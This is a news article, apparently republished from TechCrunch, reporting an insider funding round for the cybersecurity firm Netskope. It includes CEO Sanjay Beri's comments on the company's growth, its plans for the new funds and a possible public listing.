The oversubscribed insider investment was led by ICONIQ Growth, which was joined by other existing investors, including Lightspeed Venture Partners, Accel, Sequoia Capital Global Equities, Base Partners, Sapphire Ventures and Geodesic Capital.

Netskope co-founder and CEO Sanjay Beri told TechCrunch that since its founding in 2012, the company’s mission has been to guide companies through their digital transformation by finding what is most valuable to them — sensitive data — and protecting it.

“What we had before in the market didn’t work for that world,” he said. “The theory is that digital transformation is inevitable, so our vision is to transform that market so people could do that, and that is what we are building nearly a decade later.”

With this new round, Netskope continues to rack up large rounds: it raised $340 million last February, which gave it a valuation of nearly $3 billion. Prior to that, it was a $168.7 million round at the end of 2018.

Similar to other rounds, the company was not actively seeking new capital, but that it was “an inside round with people who know everything about us,” Beri said.

“The reality is we could have raised $1 billion, but we don’t need more capital,” he added. “However, having a continued strong balance sheet isn’t a bad thing. We are fortunate to be in that situation, and our destination is to be the most impactful cybersecurity company in the world.

Beri said the company just completed a “three-year journey building the largest cloud network that is 15 milliseconds from anyone in the world,” and intends to invest the new funds into continued R&D, expanding its platform and Netskope’s go-to-market strategy to meet demand for a market it estimated would be valued at $30 billion by 2024, he said.

Even pre-pandemic the company had strong hypergrowth over the past year, surpassing the market average annual growth of 50%, he added.

Today’s investment brings the total raised by Santa Clara-based Netskope to just over $1 billion, according to Crunchbase data.

With the company racking up that kind of capital, the next natural step would be to become a public company. Beri admits that Netskope could be public now, though it doesn’t have to do it for the traditional reasons of raising capital or marketing.

“Going public is one day on our path, but you probably won’t see us raise another private round,” Beri said.


Powered by WordPress | Theme: Aeros 2.0 by TheBuckmaker.com